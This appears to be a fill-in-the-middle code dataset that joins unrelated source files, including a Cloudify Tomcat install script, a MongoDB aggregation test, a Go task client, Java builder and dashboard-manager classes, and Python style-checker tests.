mapping for attribute {0} in {1}'.format(attribute_name, node.properties)) mapping_configuration = node.properties.get('_a4c_att_' + attribute_name, None) if mapping_configuration is not None: if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name: return False else: return True return False def __process_attribute_mapping(node, node_instance, attribute_name, data_retriever_function): # This is where attribute mapping is defined in the cloudify type mapping_configuration = node.properties['_a4c_att_' + attribute_name] ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration)) # If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name # Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET if mapping_configuration['parameters'][0] == 'SELF': return data_retriever_function(node, node_instance, 
mapping_configuration['parameters'][1]) elif mapping_configuration['parameters'][0] == 'TARGET' and node_instance.relationships: for rel in node_instance.relationships: relationship = __get_relationship(node, rel.get('target_name'), rel.get('type')) if mapping_configuration['parameters'][1] in relationship.get('type_hierarchy'): target_instance = client.node_instances.get(rel.get('target_id')) target_node = client.nodes.get(ctx.deployment.id, target_instance.node_id) return data_retriever_function(target_node, target_instance, mapping_configuration['parameters'][2]) return None def __recursively_get_instance_data(node, node_instance, attribute_name): if __has_attribute_mapping(node, attribute_name): return __process_attribute_mapping(node, node_instance, attribute_name, __recursively_get_instance_data) attribute_value = node_instance.runtime_properties.get(attribute_name, None) if attribute_value is not None: return attribute_value elif node_instance.relationships: for rel in node_instance.relationships: # on rel we have target_name, target_id (instanceId), type relationship = __get_relationship(node, rel.get('target_name'), rel.get('type')) if 'cloudify.relationships.contained_in' in relationship.get('type_hierarchy'): parent_instance = client.node_instances.get(rel.get('target_id')) parent_node = client.nodes.get(ctx.deployment.id, parent_instance.node_id) return __recursively_get_instance_data(parent_node, parent_instance, attribute_name) return None else: return None def parse_output(output): # by convention, the last output is the result of the operation last_output = None outputs = {} pattern = re.compile('EXPECTED_OUTPUT_(\w+)=(.*)') for line in output.splitlines(): match = pattern.match(line) if match is None: last_output = line else: output_name = match.group(1) output_value = match.group(2) outputs[output_name] = output_value return {'last_output': last_output, 'outputs': outputs} def execute(script_path, process, outputNames, command_prefix=None, cwd=None): os.chmod(script_path, 0755) on_posix = 'posix' in sys.builtin_module_names env = os.environ.copy() process_env = process.get('env', {}) env.update(process_env) if outputNames is not None: env['EXPECTED_OUTPUTS'] = outputNames if platform.system() == 'Windows': wrapper_path = ctx.download_resource("scriptWrapper.bat") else: wrapper_path = ctx.download_resource("scriptWrapper.sh") os.chmod(wrapper_path, 0755) command = '{0} {1}'.format(wrapper_path, script_path) else: command = script_path if command_prefix is not None: command = "{0} {1}".format(command_prefix, command) ctx.logger.info('Executing: {0} in env {1}'.format(command, env)) process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, cwd=cwd, bufsize=1, close_fds=on_posix) return_code = None stdout_consumer = OutputConsumer(process.stdout) stderr_consumer = OutputConsumer(process.stderr) while True: return_code = process.poll() if return_code is not None: break time.sleep(0.1) stdout_consumer.join() stderr_consumer.join() parsed_output = parse_output(stdout_consumer.buffer.getvalue()) if outputNames is not None: outputNameList = outputNames.split(';') for outputName in outputNameList: ctx.logger.info('Output name: {0} value: {1}'.format(outputName, parsed_output['outputs'].get(outputName, None))) if return_code != 0: error_message = "Script {0} encountered error with return code {1} and standard output {2}, error output {3}".format(command, return_code, stdout_consumer.buffer.getvalue(), stderr_consumer.buffer.getvalue()) 
error_message = str(unicode(error_message, errors='ignore')) ctx.logger.error(error_message) raise NonRecoverableError(error_message) else: ok_message = "Script {0} executed normally with standard output {1} and error output {2}".format(command, stdout_consumer.buffer.getvalue(), stderr_consumer.buffer.getvalue()) ok_message = str(unicode(ok_message, errors='ignore')) ctx.logger.info(ok_message) return parsed_output class OutputConsumer(object): def __init__(self, out): self.out = out self.buffer = StringIO() self.consumer = threading.Thread(target=self.consume_output) self.consumer.daemon = True self.consumer.start() def consume_output(self): for line in iter(self.out.readline, b''): self.buffer.write(line) self.out.close() def join(self): self.consumer.join() env_map = {} env_map['NODE'] = ctx.node.id env_map['INSTANCE'] = ctx.instance.id env_map['INSTANCES'] = get_instance_list(ctx.node.id) env_map['HOST'] = get_host_node_name(ctx.instance) env_map['TOMCAT_HOME'] = r'/opt/tomcat' env_map['TOMCAT_PORT'] = r'80' env_map['TOMCAT_URL'] = r'http://mirrors.ircam.fr/pub/apache/tomcat/tomcat-8/v8.0.29/bin/apache-tomcat-8.0.29.tar.gz' new_script_process = {'env': env_map} ctx.logger.info('Operation is executed with inputs {0}'.format(inputs)) if inputs.get('process', None) is not None and inputs['process'].get('env', None) is not None: ctx.logger.info('Operation is executed with environment variable {0}'.format(inputs['process']['env'])) new_script_process['env'].update(inputs['process']['env']) operationOutputNames = None convert_env_value_to_string(new_script_process['env']) parsed_output = execute(ctx.download_resource('artifacts/tomcat-war-types/scripts/tomcat_install.sh'), new_script_process, operationOutputNames) for k,v in parsed_output['outputs'].items(): ctx.logger.info('Output name: {0} value: {1}'.format(k, v)) ctx.instance.runtime_properties['_a4c_OO:tosca.interfaces.node.lifecycle.Standard:create:{0}'.format(k)] = v ctx.instance.runtime_properties['server_url'] = r'http://' + get_attribute(ctx, 'public_ip_address') + r':' + r'80' ctx.instance.update()<|fim▁end|>
if has_attribute_mapping(entity, attribute_name): # First check if any mapping exists for the attribute mapped_value = process_attribute_mapping(entity, attribute_name, get_attribute)
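The rows in this dump follow a fill-in-the-middle (FIM) layout: a prompt of the form <|fim▁begin|>prefix<|fim▁hole|>suffix<|fim▁end|>, followed by the completion that belongs in the hole. A minimal sketch of how a row can be spliced back into the original source text (the marker strings are taken from the rows themselves; the helper name is illustrative):

FIM_BEGIN = u"<|fim\u2581begin|>"
FIM_HOLE = u"<|fim\u2581hole|>"
FIM_END = u"<|fim\u2581end|>"

def splice_fim_row(prompt, completion):
    # Drop the begin marker and everything after the end marker.
    body = prompt.split(FIM_BEGIN, 1)[-1]
    body = body.rsplit(FIM_END, 1)[0]
    # The completion replaces the hole, restoring the original file text.
    prefix, _, suffix = body.partition(FIM_HOLE)
    return prefix + completion + suffix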
<|file_name|>test-aggregate-pipeline.js<|end_file_name|><|fim▁begin|>var insert = require('./insert') var concat = require('concat-stream') insert('aggregate', [{ name: 'Squirtle', type: 'water' }, { name: 'Starmie', type: 'water' }, { name: 'Charmander', type: 'fire' }, { name: 'Lapras', type: 'water' }], function (db, t, done) { db.a.aggregate([{$group: {_id: '$type'}}, {$project: { _id: 0, foo: '$_id' }}], function (err, types) { console.log(err, types) var arr = types.map(function (x) {return x.foo}) console.log('arr', arr) t.equal(types.length, 2) console.log('here') t.notEqual(arr.indexOf('fire'), -1) console.log('there') t.notEqual(arr.indexOf('water'), -1) console.log('where') // test as a stream var strm = db.a.aggregate([{$group: {_id: '$type'}}, {$project: {_id: 0, foo: '$_id'}}]) strm.pipe(concat(function (types) { var arr = types.map(function (x) {return x.foo}) t.equal(types.length, 2) t.notEqual(arr.indexOf('fire'), -1) t.notEqual(arr.indexOf('water'), -1)<|fim▁hole|> t.end() })) strm.on('error', function (err) { // Aggregation cursors are only supported on mongodb 2.6+ // this shouldn't fail the tests for other versions of mongodb if (err.message === 'unrecognized field "cursor') t.ok(1) else t.fail(err) t.end() }) }) })<|fim▁end|>
<|file_name|>client.go<|end_file_name|><|fim▁begin|>package client import ( "context" "net/http" "github.com/tidepool-org/platform/errors" "github.com/tidepool-org/platform/page" "github.com/tidepool-org/platform/platform" "github.com/tidepool-org/platform/request" structureValidator "github.com/tidepool-org/platform/structure/validator" "github.com/tidepool-org/platform/task" ) type Client struct { client *platform.Client } func New(cfg *platform.Config, authorizeAs platform.AuthorizeAs) (*Client, error) { clnt, err := platform.NewClient(cfg, authorizeAs) if err != nil { return nil, err } return &Client{ client: clnt, }, nil } func (c *Client) ListTasks(ctx context.Context, filter *task.TaskFilter, pagination *page.Pagination) (task.Tasks, error) { if ctx == nil { return nil, errors.New("context is missing") } if filter == nil { filter = task.NewTaskFilter() } else if err := structureValidator.New().Validate(filter); err != nil { return nil, errors.Wrap(err, "filter is invalid") } if pagination == nil { pagination = page.NewPagination() } else if err := structureValidator.New().Validate(pagination); err != nil { return nil, errors.Wrap(err, "pagination is invalid") } url := c.client.ConstructURL("v1", "tasks") tsks := task.Tasks{} if err := c.client.RequestData(ctx, http.MethodGet, url, []request.RequestMutator{filter, pagination}, nil, &tsks); err != nil { return nil, err } return tsks, nil } func (c *Client) CreateTask(ctx context.Context, create *task.TaskCreate) (*task.Task, error) { if ctx == nil { return nil, errors.New("context is missing") } if create == nil { return nil, errors.New("create is missing") } else if err := structureValidator.New().Validate(create); err != nil { return nil, errors.New("create is invalid") } url := c.client.ConstructURL("v1", "tasks") tsk := &task.Task{} if err := c.client.RequestData(ctx, http.MethodPost, url, nil, create, tsk); err != nil { return nil, err } return tsk, nil } func (c *Client) GetTask(ctx context.Context, id string) (*task.Task, error) { if ctx == nil { return nil, errors.New("context is missing") } if id == "" { return nil, errors.New("id is missing") } url := c.client.ConstructURL("v1", "tasks", id) tsk := &task.Task{} if err := c.client.RequestData(ctx, http.MethodGet, url, nil, nil, tsk); err != nil { if request.IsErrorResourceNotFound(err) { return nil, nil } return nil, err } return tsk, nil } func (c *Client) UpdateTask(ctx context.Context, id string, update *task.TaskUpdate) (*task.Task, error) { if ctx == nil { return nil, errors.New("context is missing") } if id == "" { return nil, errors.New("id is missing") } if update == nil { return nil, errors.New("update is missing") } else if err := structureValidator.New().Validate(update); err != nil { return nil, errors.Wrap(err, "update is invalid") } url := c.client.ConstructURL("v1", "tasks", id) tsk := &task.Task{} if err := c.client.RequestData(ctx, http.MethodPut, url, nil, update, tsk); err != nil { if request.IsErrorResourceNotFound(err) { return nil, nil<|fim▁hole|> } return nil, err } return tsk, nil } func (c *Client) DeleteTask(ctx context.Context, id string) error { if ctx == nil { return errors.New("context is missing") } if id == "" { return errors.New("id is missing") } url := c.client.ConstructURL("v1", "tasks", id) return c.client.RequestData(ctx, http.MethodDelete, url, nil, nil, nil) }<|fim▁end|>
<|file_name|>ItemValueBuilder.java<|end_file_name|><|fim▁begin|>package com.amee.domain.data.builder.v2; import com.amee.base.utils.XMLUtils; import com.amee.domain.Builder; import com.amee.domain.ItemBuilder; import com.amee.domain.ItemService; import com.amee.domain.TimeZoneHolder; import com.amee.domain.item.BaseItemValue; import com.amee.domain.item.NumberValue; import com.amee.platform.science.StartEndDate; import org.json.JSONException; import org.json.JSONObject; import org.w3c.dom.Document; import org.w3c.dom.Element; <|fim▁hole|> private BaseItemValue itemValue; private ItemBuilder itemBuilder; private ItemService itemService; public ItemValueBuilder(BaseItemValue itemValue, ItemService itemService) { this.itemValue = itemValue; this.itemService = itemService; } public ItemValueBuilder(BaseItemValue itemValue, ItemBuilder itemBuilder, ItemService itemService) { this(itemValue, itemService); this.itemBuilder = itemBuilder; } public JSONObject getJSONObject() throws JSONException { return getJSONObject(true); } public JSONObject getJSONObject(boolean detailed) throws JSONException { JSONObject obj = new JSONObject(); obj.put("uid", itemValue.getUid()); obj.put("path", itemValue.getPath()); obj.put("name", itemValue.getName()); obj.put("value", itemValue.getValueAsString()); if (NumberValue.class.isAssignableFrom(itemValue.getClass())) { NumberValue numberValue = (NumberValue) itemValue; obj.put("unit", numberValue.getUnit()); obj.put("perUnit", numberValue.getPerUnit()); } else { obj.put("unit", ""); obj.put("perUnit", ""); } obj.put("startDate", StartEndDate.getLocalStartEndDate(itemService.getStartDate(itemValue), TimeZoneHolder.getTimeZone()).toString()); obj.put("itemValueDefinition", itemValue.getItemValueDefinition().getJSONObject(false)); obj.put("displayName", itemValue.getDisplayName()); obj.put("displayPath", itemValue.getDisplayPath()); if (detailed) { obj.put("created", itemValue.getCreated()); obj.put("modified", itemValue.getModified()); obj.put("item", itemBuilder.getJSONObject(true)); } return obj; } public Element getElement(Document document) { return getElement(document, true); } public Element getElement(Document document, boolean detailed) { Element element = document.createElement("ItemValue"); element.setAttribute("uid", itemValue.getUid()); element.appendChild(XMLUtils.getElement(document, "Path", itemValue.getPath())); element.appendChild(XMLUtils.getElement(document, "Name", itemValue.getName())); element.appendChild(XMLUtils.getElement(document, "Value", itemValue.getValueAsString())); if (NumberValue.class.isAssignableFrom(itemValue.getClass())) { NumberValue numberValue = (NumberValue) itemValue; element.appendChild(XMLUtils.getElement(document, "Unit", numberValue.getUnit().toString())); element.appendChild(XMLUtils.getElement(document, "PerUnit", numberValue.getPerUnit().toString())); } else { element.appendChild(XMLUtils.getElement(document, "Unit", "")); element.appendChild(XMLUtils.getElement(document, "PerUnit", "")); } element.appendChild(XMLUtils.getElement(document, "StartDate", StartEndDate.getLocalStartEndDate(itemService.getStartDate(itemValue), TimeZoneHolder.getTimeZone()).toString())); element.appendChild(itemValue.getItemValueDefinition().getElement(document, false)); if (detailed) { element.setAttribute("Created", itemValue.getCreated().toString()); element.setAttribute("Modified", itemValue.getModified().toString()); element.appendChild(itemBuilder.getIdentityElement(document)); } return element; } public JSONObject 
getIdentityJSONObject() throws JSONException { JSONObject obj = new JSONObject(); obj.put("uid", itemValue.getUid()); obj.put("path", itemValue.getPath()); return obj; } public Element getIdentityElement(Document document) { return XMLUtils.getIdentityElement(document, "ItemValue", itemValue); } }<|fim▁end|>
public class ItemValueBuilder implements Builder {
<|file_name|>nsiqcppstyle_unittestbase.py<|end_file_name|><|fim▁begin|># Copyright (c) 2009 NHN Inc. All rights reserved. # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of NHN Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import nsiqcppstyle_checker import unittest import nsiqcppstyle_rulemanager<|fim▁hole|> errors = [] def AddError(err): errors.append(err) def CheckErrorContent(msg): for err in errors : if err[1] == msg : return True return False def MockError(token, category, message): AddError((token, category, message)) print token, category, message class nct(unittest.TestCase): def setUp(self): nsiqcppstyle_rulemanager.ruleManager.ResetRules() nsiqcppstyle_rulemanager.ruleManager.ResetRegisteredRules() nsiqcppstyle_state._nsiqcppstyle_state.verbose = True nsiqcppstyle_reporter.Error = MockError self.setUpRule() global errors errors = [] def Analyze(self, filename, data): nsiqcppstyle_checker.ProcessFile(nsiqcppstyle_rulemanager.ruleManager, filename, data)<|fim▁end|>
import nsiqcppstyle_reporter import nsiqcppstyle_state
<|file_name|>cmake_unittest.py<|end_file_name|><|fim▁begin|># Copyright (C) 2012 Intel Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Unit test for cmake.py.""" import unittest2 as unittest from cmake import CMakeChecker class CMakeCheckerTest(unittest.TestCase): """Tests CMakeChecker class.""" def test_init(self): """Test __init__() method.""" def _mock_handle_style_error(self): pass checker = CMakeChecker("foo.cmake", _mock_handle_style_error) self.assertEqual(checker._handle_style_error, _mock_handle_style_error) def test_check(self): """Test check() method.""" errors = [] def _mock_handle_style_error(line_number, category, confidence, message): error = (line_number, category, confidence, message) errors.append(error) checker = CMakeChecker("foo.cmake", _mock_handle_style_error) lines = [ '# This file is sample input for cmake_unittest.py and includes below problems:\n', 'IF ()', '\tmessage("Error line with Tab")\n', ' message("Error line with endding spaces") \n', ' message( "Error line with space after (")\n', ' message("Error line with space before (" )\n', ' MESSAGE("Error line with upper case non-condtional command")\n', ' MESSage("Error line with upper case non-condtional command")\n', ' message("correct message line")\n', 'ENDif ()\n', '\n', 'if()\n', 'endif ()\n', '\n', 'macro ()\n', 'ENDMacro()\n', '\n', 'function ()\n', 'endfunction()\n', '\n', 'set(name a)\n', 'set(name a b c)\n', 'set(name a\n', 'b)\n', 'set(name', 'abc\n', ')\n', 'list(APPEND name a)\n', 'list(APPEND name\n', 'a\n', 'a\n', ')\n', 'list(APPEND name\n', 'b\n', 'a\n', '\n', 'c/a.a\n', '\n', 'c/b/a.a\n', '${aVariable}\n', '\n', 'c/c.c\n', '\n', 'c/b/a.a\n', ')\n', 'list(REMOVE_ITEM name a)\n', 'list(REMOVE_ITEM name\n', 'a\n', '\n', 'b\n', ')\n', 'list(REMOVE_ITEM name\n', 'a/a.a\n', 'a/b.b\n', 'b/a.a\n', '\n', '\n', 'c/a.a\n', ')\n', ] checker.check(lines) self.maxDiff = None self.assertEqual(errors, [ (3, 'whitespace/tab', 5, 'Line contains tab character.'), (2, 'command/lowercase', 5, 'Use lowercase command "if"'), (4, 'whitespace/trailing', 5, 'No trailing spaces'), (5, 'whitespace/parentheses', 5, 'No space after "("'), (6, 'whitespace/parentheses', 5, 'No space before ")"'), (7, 'command/lowercase', 5, 'Use lowercase command "message"'), (8, 'command/lowercase', 5, 'Use lowercase 
command "message"'), (10, 'command/lowercase', 5, 'Use lowercase command "endif"'), (12, 'whitespace/parentheses', 5, 'One space between command "if" and its parentheses, should be "if ("'), (15, 'whitespace/parentheses', 5, 'No space between command "macro" and its parentheses, should be "macro("'), (16, 'command/lowercase', 5, 'Use lowercase command "endmacro"'), (18, 'whitespace/parentheses', 5, 'No space between command "function" and its parentheses, should be "function("'), (23, 'list/parentheses', 5, 'First listitem "a" should be in a new line.'), (24, 'list/parentheses', 5, 'The parentheses after the last listitem "b" should be in a new line.'), (31, 'list/duplicate', 5, 'The item "a" should be added only once to the list.'), (35, 'list/order', 5, 'Alphabetical sorting problem. "a" should be before "b".'), (41, 'list/order', 5, 'Alphabetical sorting problem. "c/c.c" should be before "c/b/a.a".'), (49, 'list/emptyline', 5, 'There should be no empty line between "a" and "b".'), (54, 'list/emptyline', 5, 'There should be exactly one empty line instead of 0 between "a/b.b" and "b/a.a".'), (57, 'list/emptyline', 5, 'There should be exactly one empty line instead of 2 between "b/a.a" and "c/a.a".'),<|fim▁hole|><|fim▁end|>
])
<|file_name|>anagram_solver.py<|end_file_name|><|fim▁begin|>#!/usr/local/bin/python3.5 import itertools import sys from .stuff import word_set<|fim▁hole|> def find_possible(lst): """ Return all possible combinations of letters in lst @type lst: [str] @rtype: [str] """ returned_list = [] for i in range(0, len(lst) + 1): for subset in itertools.permutations(lst, i): possible = '' for letter in subset: possible += letter if len(possible) == len(lst): # itertools.permutations returns smaller lists returned_list.append(possible) return returned_list def return_words(lst, word_set): """ Return combinations in that are words in word_set @type lst: [str] @type word_set: set(str) @rtype: [str] """ returned_list = [] for word in lst: if word in word_set or word.capitalize() in word_set: # Some words are capitalized in the word_set returned_list.append(word) return returned_list def main(): """ Main function to run the program """ anagram_lst = [] anagram = sys.argv[1] for char in anagram: anagram_lst.append(char) possible_words = find_possible(anagram_lst) actual_words = return_words(possible_words, word_set) print('Solutions:') if len(actual_words) == 0: print('None found') else: for item in set(actual_words): # Running through in set form prevents duplicates print(item)<|fim▁end|>
__version__ = "1.1.0"
<|file_name|>DashboardManagerImpl.java<|end_file_name|><|fim▁begin|>/* * NOTE: This copyright does *not* cover user programs that use HQ * program services by normal system calls through the application * program interfaces provided as part of the Hyperic Plug-in Development * Kit or the Hyperic Client Development Kit - this is merely considered * normal use of the program, and does *not* fall under the heading of * "derived work". * * Copyright (C) [2004-2009], Hyperic, Inc. * This file is part of HQ. * * HQ is free software; you can redistribute it and/or modify * it under the terms version 2 of the GNU General Public License as * published by the Free Software Foundation. This program is distributed * in the hope that it will be useful, but WITHOUT ANY WARRANTY; without * even the implied warranty of MERCHANTABILITY or FITNESS FOR A * PARTICULAR PURPOSE. See the GNU General Public License for more * details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 * USA. */ package org.hyperic.hq.ui.server.session; import java.rmi.RemoteException; import java.util.ArrayList; import java.util.Collection; import java.util.List; import javax.security.auth.login.LoginException; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import org.hyperic.hq.appdef.shared.AppdefEntityID; import org.hyperic.hq.auth.shared.SessionManager; import org.hyperic.hq.auth.shared.SessionNotFoundException; import org.hyperic.hq.auth.shared.SessionTimeoutException; import org.hyperic.hq.authz.server.session.AuthzApplicationEvent; import org.hyperic.hq.authz.server.session.AuthzSubject; import org.hyperic.hq.authz.server.session.Role; import org.hyperic.hq.authz.server.session.RoleCreatedEvent; import org.hyperic.hq.authz.server.session.RoleDeleteRequestedEvent; import org.hyperic.hq.authz.server.session.RoleRemoveFromSubjectRequestedEvent; import org.hyperic.hq.authz.server.session.SubjectDeleteRequestedEvent; import org.hyperic.hq.authz.shared.AuthzConstants; import org.hyperic.hq.authz.shared.AuthzSubjectManager; import org.hyperic.hq.authz.shared.PermissionException; import org.hyperic.hq.authz.shared.PermissionManager; import org.hyperic.hq.authz.shared.PermissionManagerFactory; import org.hyperic.hq.bizapp.shared.AuthzBoss; import org.hyperic.hq.common.server.session.Crispo; import org.hyperic.hq.common.server.session.CrispoOption; import org.hyperic.hq.common.shared.CrispoManager; import org.hyperic.hq.ui.Constants; import org.hyperic.hq.ui.Dashboard; import org.hyperic.hq.ui.WebUser; import org.hyperic.hq.ui.shared.DashboardManager; import org.hyperic.util.StringUtil; import org.hyperic.util.config.ConfigResponse; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.context.ApplicationListener; import org.springframework.stereotype.Service; import org.springframework.transaction.annotation.Transactional; /** */ @Service @Transactional public class DashboardManagerImpl implements DashboardManager, ApplicationListener<AuthzApplicationEvent> { private Log log = LogFactory.getLog(DashboardManagerImpl.class); protected SessionManager sessionManager = SessionManager.getInstance(); private DashboardConfigDAO dashDao; private CrispoManager crispoManager; private AuthzSubjectManager authzSubjectManager; @Autowired public DashboardManagerImpl(DashboardConfigDAO dashDao, CrispoManager crispoManager, 
AuthzSubjectManager authzSubjectManager) { this.dashDao = dashDao; this.crispoManager = crispoManager; this.authzSubjectManager = authzSubjectManager; } /** */ @Transactional(readOnly = true) public UserDashboardConfig getUserDashboard(AuthzSubject me, AuthzSubject user) throws PermissionException { PermissionManager permMan = PermissionManagerFactory.getInstance(); if (!me.equals(user) && !permMan.hasAdminPermission(me.getId())) { throw new PermissionException("You are unauthorized to see this " + "dashboard"); } return dashDao.findDashboard(user); } /** */ @Transactional(readOnly = true) public RoleDashboardConfig getRoleDashboard(AuthzSubject me, Role r) throws PermissionException { PermissionManager permMan = PermissionManagerFactory.getInstance(); permMan.check(me.getId(), r.getResource().getResourceType(), r.getId(), AuthzConstants.roleOpModifyRole); return dashDao.findDashboard(r); } private ConfigResponse getDefaultConfig() { return new ConfigResponse(); } /** */ public UserDashboardConfig createUserDashboard(AuthzSubject me, AuthzSubject user, String name) throws PermissionException { PermissionManager permMan = PermissionManagerFactory.getInstance(); if (!me.equals(user) && !permMan.hasAdminPermission(me.getId())) { throw new PermissionException("You are unauthorized to create " + "this dashboard"); } Crispo cfg = crispoManager.create(getDefaultConfig()); UserDashboardConfig dash = new UserDashboardConfig(user, name, cfg); dashDao.save(dash); return dash; } /** */ public RoleDashboardConfig createRoleDashboard(AuthzSubject me, Role r, String name) throws PermissionException { PermissionManager permMan = PermissionManagerFactory.getInstance(); permMan.check(me.getId(), r.getResource().getResourceType(), r.getId(), AuthzConstants.roleOpModifyRole); Crispo cfg = crispoManager.create(getDefaultConfig()); RoleDashboardConfig dash = new RoleDashboardConfig(r, name, cfg); dashDao.save(dash); return dash; } /** * Reconfigure a user's dashboard */ public void configureDashboard(AuthzSubject me, DashboardConfig cfg, ConfigResponse newCfg) throws PermissionException { if (!isEditable(me, cfg)) { throw new PermissionException("You are unauthorized to modify " + "this dashboard"); } crispoManager.update(cfg.getCrispo(), newCfg); } /** */ public void renameDashboard(AuthzSubject me, DashboardConfig cfg, String name) throws PermissionException { if (!isEditable(me, cfg)) { throw new PermissionException("You are unauthorized to modify " + "this dashboard"); } cfg.setName(name); } /** * Determine if a dashboard is editable by the passed user */ @Transactional(readOnly = true) public boolean isEditable(AuthzSubject me, DashboardConfig dash) { PermissionManager permMan = PermissionManagerFactory.getInstance(); if (permMan.hasAdminPermission(me.getId())) return true; return dash.isEditable(me); } /** */ @Transactional(readOnly = true) public Collection<DashboardConfig> getDashboards(AuthzSubject me) throws PermissionException { Collection<DashboardConfig> res = new ArrayList<DashboardConfig>(); PermissionManager permMan = PermissionManagerFactory.getInstance(); if (permMan.hasGuestRole() && permMan.hasAdminPermission(me.getId())) { res.addAll(dashDao.findAllRoleDashboards()); res.add(getUserDashboard(me, me)); return res; } UserDashboardConfig cfg = getUserDashboard(me, me); if (cfg != null) res.add(cfg); if (permMan.hasGuestRole()) res.addAll(dashDao.findRolesFor(me)); return res; } /** * Update dashboard and user configs to account for resource deletion * * @param ids An array of ID's of removed 
resources */ public void handleResourceDelete(AppdefEntityID[] ids) { for (int i = 0; i < ids.length; i++) { String appdefKey = ids[i].getAppdefKey(); List<CrispoOption> copts = crispoManager.findOptionByValue(appdefKey); for (CrispoOption o : copts) { String val = o.getValue(); String newVal = removeResource(val, appdefKey); if (!val.equals(newVal)) { crispoManager.updateOption(o, newVal); log.debug("Update option key=" + o.getKey() + " old =" + val + " new =" + newVal); } } } } /** */<|fim▁hole|> try { AuthzSubject me = authzSubjectManager.findSubjectByName(user); preferences = getUserDashboard(me, me).getConfig(); } catch (Exception e) { throw new LoginException("Username has no preferences"); } // Let's make sure that the rss auth token matches String prefToken = preferences.getValue(Constants.RSS_TOKEN); if (token == null || !token.equals(prefToken)) throw new LoginException("Username and Auth token do not match"); return preferences; } private String removeResource(String val, String resource) { val = StringUtil.remove(val, resource); val = StringUtil.replace(val, Constants.EMPTY_DELIMITER, Constants.DASHBOARD_DELIMITER); return val; } public void onApplicationEvent(AuthzApplicationEvent event) { if(event instanceof SubjectDeleteRequestedEvent) { dashDao.handleSubjectRemoval(((SubjectDeleteRequestedEvent)event).getSubject()); }else if(event instanceof RoleDeleteRequestedEvent) { roleRemoved(((RoleDeleteRequestedEvent)event).getRole()); }else if(event instanceof RoleCreatedEvent) { roleCreated(((RoleCreatedEvent)event).getRole()); }else if(event instanceof RoleRemoveFromSubjectRequestedEvent) { roleRemovedFromSubject(((RoleRemoveFromSubjectRequestedEvent)event).getRole(), ((RoleRemoveFromSubjectRequestedEvent)event).getSubject()); } } private void roleRemoved(Role role) { RoleDashboardConfig cfg = dashDao.findDashboard(role); if (cfg == null) { return; } List<CrispoOption> opts = crispoManager.findOptionByKey(Constants.DEFAULT_DASHBOARD_ID); for (CrispoOption opt : opts) { if (Integer.valueOf(opt.getValue()).equals(cfg.getId())) { crispoManager.updateOption(opt, null); } } dashDao.handleRoleRemoval(role); } private void roleCreated(Role role) { Crispo cfg = crispoManager.create(getDefaultConfig()); RoleDashboardConfig dash = new RoleDashboardConfig(role, role.getName() + " Role Dashboard", cfg); dashDao.save(dash); } private void roleRemovedFromSubject(Role r, AuthzSubject from) { RoleDashboardConfig cfg = dashDao.findDashboard(r); Crispo c = from.getPrefs(); if (c != null) { for (CrispoOption opt : c.getOptions()) { if (opt.getKey().equals(Constants.DEFAULT_DASHBOARD_ID) && Integer.valueOf(opt.getValue()).equals(cfg.getId())) { crispoManager.updateOption(opt, null); break; } } } } @Transactional(readOnly = true) public List<DashboardConfig> findEditableDashboardConfigs(WebUser user, AuthzBoss boss) throws SessionNotFoundException, SessionTimeoutException, PermissionException, RemoteException { AuthzSubject me = 